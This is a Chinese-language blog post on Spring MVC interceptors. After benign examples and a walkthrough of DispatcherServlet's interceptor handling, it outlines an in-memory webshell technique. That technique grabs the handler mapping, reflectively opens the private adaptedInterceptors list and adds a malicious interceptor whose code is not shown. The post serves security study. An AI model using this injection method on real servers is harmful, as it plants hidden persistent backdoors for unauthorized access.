『Java安全』Java Spring内存马_动态注册Interceptor拦截器内存马

已于 2022-04-12 13:13:47 修改
阅读量1.2k 收藏 3
点赞数 1
分类专栏: # Java内存马基础
于 2022-04-07 23:02:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/124024799
版权

文章目录

前言

Interceptor和Filter的区别

Interceptor和Filter过滤器不同:
在这里插入图片描述
拦截器一般用来做日志记录,过滤器用于过滤非法操作

实现HandlerInterceptor接口

编写Interceptor需要实现HandlerInterceptor接口,有三个方法,其中preHandle返回bool
在这里插入图片描述

方法调用顺序

在这里插入图片描述

  1. preHandle在Controller之前调用,如果返回true继续运行,否则直接中断
  2. postHandle和afterCompletion的调用要保证preHandle返回true

编写Interceptor

写一个示例Interceptor

package com.example.javaspring;

import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class MyInterceptor implements HandlerInterceptor {
    @Override
    public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
        System.out.println("afterCompletion()");
    }

    @Override
    public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
        System.out.println("postHandle()");
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        System.out.println("preHandle()");
        response.setContentType("text/html");
        response.getOutputStream().print("preHandle()<br>");
        response.flushBuffer();
        return true;
    }
}

有一个关键点:如果需要在页面上显示时,调用response.getOutputStream(),如果调用getWriter()会由于Writer冲突而报错;最后清空缓存

配置启用Interceptor

对于过滤器,直接配置注解即可,而拦截器需要手动编写一个Config添加进去才能生效

配置需要继承WebMvcConfigurer接口,重写addInterceptors方法,设置@Configuration注解

package com.example.javaspring;

import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class InterceptorConfig implements WebMvcConfigurer {
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(new MyInterceptor()).addPathPatterns("/");
    }
}

直接向InterceptorRegistry注册自定义拦截器实例,然后调用addPathPatterns方法添加URl拦截规则即可

拦截规则支持通配符****匹配任意一层目录、 **匹配任意多层目录

Interceptor示例

有一个Index的Controller在这里插入图片描述
访问
在这里插入图片描述
命令台有回显,调用顺序如图所示:
在这里插入图片描述

Interceptor调用分析

在preHandle打上断点,来到DispatcherServlet.doDispatch()
在这里插入图片描述
先进性了getHandler的操作
在这里插入图片描述
遍历handlerMapping,然后调用getHandler方法
在这里插入图片描述
最终调用的是SimpleUrlHandler的getHandler方法,是一个HandlerExecutionChain对象
在这里插入图片描述
返回上一步看一看SimpleUrlHandler的getHandler方法细节:

调用了AbstractHandlerMapping.getHandlerExecutionChain

在这里插入图片描述
从adaptedInterceptors把符合的拦截器统统添加到chain里面了
在这里插入图片描述
adaptedInterceptors存放着全部拦截器,是private的,而且是List类型
在这里插入图片描述

然后继续追DispatcherServlet,来到applyPreHandle调用preHandle方法
在这里插入图片描述
在这里插入图片描述

Interceptor内存马

原理

参照调用流程:

  1. 获取RequestMappingHandlerMapping
  2. 获取adaptedInterceptors
  3. 由于是List直接add

Ⅰ. 获取RequestMappingHandlerMapping

AbstractHandlerMapping实现是RequestMappingHandlerMapping,这步与恶意Controller一致

WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);

RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);

Ⅱ. 获取adaptedInterceptors

反射

        Field field = null;
        try {
            field = RequestMappingHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        }
        field.setAccessible(true);
        List<HandlerInterceptor> adaptInterceptors = null;
        try {
            adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }

Ⅲ. 添加恶意拦截器

adaptInterceptors.add(new InjectEvilInterceptor("a"));

参考引用

https://www.cnblogs.com/cnsdhzzl/p/6109424.html
https://www.cnblogs.com/zpchcbd/p/15545773.html
https://blog.csdn.net/reggergdsg/article/details/52962774
https://blog.csdn.net/chenleixing/article/details/44573495
https://blog.csdn.net/weixin_44360895/article/details/113796040

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/124024799
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详解javaspring里的三大拦截器
08-26
Java Spring框架中,拦截器Interceptor)是用于增强应用程序功能和实现通用逻辑的重要组件。它们可以看作是在控制器(Controller)处理请求之前和之后执行的一系列预定义操作。Spring 提供了三种主要类型的拦截...
再谈Spring内存Interceptor(内存系列篇十)
阿道夫的博客
03-10 253
在系统中,经常需要在处理用户请求之前和之后执行一些行为,例如检测用户的权限,或者将请求的信息记录到日志中,即平时所说的“权限检测”及“日志记录”。当然不仅仅这些,所以需要一种机制,拦截用户的请求,在请求的前后添加处理逻辑。Spring MVC 提供了 Interceptor 拦截器机制,用于请求的预处理和后处理。在实际应用中常见的作用为:日志记录:记录请求信息的日志,以便进行信息监控、信息统计、计算 PV(Page View)等;权限检查:如登录检测,进入处理器检测是否登录;
SpringBoot注册Interceptor 拦截器问题
zhagnchong480的博客
02-19 461
问题场景 昨夜业界大佬给小编带来了内网穿透,于是小编兴致勃勃博的上干了个SpringBoot 项目,来查看是否能进行正常访问,功夫不负有心人,还是业界大佬牛皮,让小编成功的能通过外网访问到内网的项目了。 过了一会小编就跟基友吹牛逼扯淡,把基友的照片放到小编的项目中 让基友群的基友们访问查看,这时小编突然想获取一下他们的IP 做一下记录,看一下PV 点击量,嘿嘿嘿。 小编的思路是在SpringBoot 中加入全局拦截器来做业务逻辑。 小编这时候突然想到了SpringBoot 中怎么该怎么注册Intercep
JavaWeb】Day67.拦截器Interceptor
最新发布
m0_74197695的博客
05-06 725
拦截器是一种动态拦截方法调用的机制,类似于过滤器。是Spring框架中提供的,用来动态拦控制器方法的执行。拦截器的作用:拦截请求,在指定方法调用前后,根据业务需要执行预先设定的代码。在拦截器当中,通常也是做一些通用性的操作,比如:我们可以通过拦截器来拦截前端发起的请求,将登录校验的逻辑全部编写在拦截器当中。在校验的过程当中,如发现用户登录了(携带JWT令牌且是合法令牌),就可以直接放行,去访问spring当中的资源。如果校验时发现并没有登录或是非法令牌,就可以直接给前端响应未登录的错误信息。
spring 注册拦截器Interceptor
虾米大王的学习历程
08-07 235
注意,只有preHandle方法返回true时后面的方法才会执行。当拦截器内存在多个拦截器时,postHandler在拦截器链内的所有拦截器返回成功时才会调用,而afterCompletion只有preHandle返回true才调用,但若拦截器链内的第一个拦截器的preHandle方法返回false,则后面的方法都不会执行。Spring MVC中提供了AOP风格的拦截器,拥有更加精细的拦截处理能力。在浏览器中提供/hello2和/hello接口分别进行访问,当访问/hello2接口时,打印日志。
mybatis-interceptorSpring动态拦截器
xiangbq的博客
05-28 8985
Spring动态拦截器,有需要的朋友可以参考下。 一、前言 拦截器的一个作用就是我们可以拦截某些方法的调用,我们可以选择在这些被拦截的方法执行前后加上某些逻辑,或者丢弃这些被拦截的方法而执行自己的逻辑。如对于mybatis的Executor,有几种实现:BatchExecutor,ReuseExecutor、SimpleExecutor和CachingExecutor,当这几种Exec
SpringBoot注册Servlet、Filter、Listener、Interceptor四大组件
yuanjinshenglife的专栏
01-21 1298
SpringBoot注册Servlet、Filter、Listener、Interceptor等四大Web常用组件
java + spring boot +jpa 拦截器分库分表demo
03-30
Spring Boot中注册拦截器,我们需要在配置类中使用`@EnableAspectJAutoProxy`开启AOP代理,并通过`@Bean`注解声明拦截器实例。然后,使用`@Around`注解定义切点,即拦截所有的JPA操作。 在实际开发中,为了使分库...
浅析javaSpring MVC 拦截器作用及其实现
08-30
JavaSpring MVC框架中,拦截器Interceptor)是一个强大的工具,它允许开发者在请求处理的前后阶段执行自定义逻辑,比如进行权限检查、日志记录、性能统计等。这篇文章将深入探讨Spring MVC拦截器的作用、实现...
spring boot加入拦截器Interceptor过程解析
08-25
"Spring Boot 中的拦截器Interceptor 配置和使用详解" Spring Boot 框架提供了拦截器Interceptor机制,用于在请求处理前、后执行某些操作。拦截器Interceptor可以用来实现身份验证、日志记录、缓存、权限控制等...
Spring MVC 拦截器 interceptor 用法详解
08-18
Spring MVC 拦截器 interceptor 用法详解 Spring MVC 中的拦截器Interceptor)类似于 Servlet 中的过滤器(Filter),它主要用于拦截用户请求并作相应的处理。例如通过拦截器可以进行权限验证、记录请求信息的...
Java后端如何添加拦截器
weixin_70730532的博客
05-16 2295
安全编码规范中,在Java后端controller层接口需要对调用者的身份进行确认,以防非法用户进行访问。若是在controller层的每个接口处都添加逻辑判断,那么代码重复度高,并且费力费时。此时,就需要在请求到达controller层时提前截取数据流,对相关数据进行校验。在这里将要提到的方式就是在后端添加http拦截器,这样每一次的http请求都需要经过拦截器的认证后才可以继续往下走。那么如何有效地添加拦截器呢?下面将会详细给告诉你怎么添加。   (1)为了方便代码管理,我们先创建一个文件夹,其名为
springmvc---day2
m0_63703905的博客
04-26 418
拦截器开发 步骤1:创建拦截器类 让类实现HandlerInterceptor接口,重写接口中的三个方法。 @Component //定义拦截器类,实现HandlerInterceptor接口 //注意当前类必须受Spring容器控制 public class ProjectInterceptor implements HandlerInterceptor { @Override //原始方法调用前执行的内容 public boolean preHandle(HttpServ...
springmvc中WebMvcConfigurationSupport中addInterceptor使用详解及方法详解
qq_62357662的博客
09-15 3070
Spring MVC中,是一个类,可以通过继承它来进行自定义的MVC配置。在这个类中,可以使用方法来添加拦截器到请求处理链中。下面是关于总之,:用于注册拦截器。我们可以通过重写这个方法,将自定义的拦截器添加到registry中。
SpringMVC拦截器
weixin_61498231的博客
10-02 667
定义拦截器,在前置拦截方法preHandle中解析token并验证有效性,如果失效返回状态码401。如果有效,解析User对象,存入ThreadLocal中。1.定义ThreadLocal工具类,仅需要调用set方法即可将数据存入ThreadLocal中。拦截器需要注册到MVC容器中。
JAVA中的拦截器、过滤器
热门推荐
qq_38254635的博客
06-14 1万+
相关解释:拦截器依赖于页面有访问controller的操作,且属于SpringMVC体系的动态拦截调用机制,是java中AOP思想的运用。来看看源码作者的注释:其中倒数第二段话,描述其类似于过滤器,但其特点只允许使用自定义预处理,不能处理程序本身。此处可体现AOP思想。过滤器是在web.xml中配置,web.xml是应用程序上下文中的HandlerInterceptor。最后一段话,则体现了拦截器常用情况,如常见处理程序代码和授权检查。
java拦截器Interceptor
zhyaw56zhu的博客
02-21 239
java拦截器Interceptor
Spring Boot拦截器Java学习笔记)
m0_59803718的博客
04-12 280
Spring Boot拦截器知识:定义拦截器注册拦截器,指定拦截规则,实现登录功能等,验证登录及登录拦截功能。
拦截器 java_在Java后端如何添加拦截器
weixin_42309083的博客
02-19 861
(1)InterceptorConfig.java文件内容如下:import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;import org.springframework.context.annotation.Configuration;import org.springframework.web.ser...
java拦截器handler_Spring 拦截器实现+后台原理(HandlerInterceptor
06-13
Spring MVC 中,我们可以通过配置 Bean 实现拦截器注册和配置。具体步骤如下: 1. 创建一个类,实现 HandlerInterceptor 接口,实现 preHandle()、postHandle() 和 afterCompletion() 方法。 2. 在 Spring ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值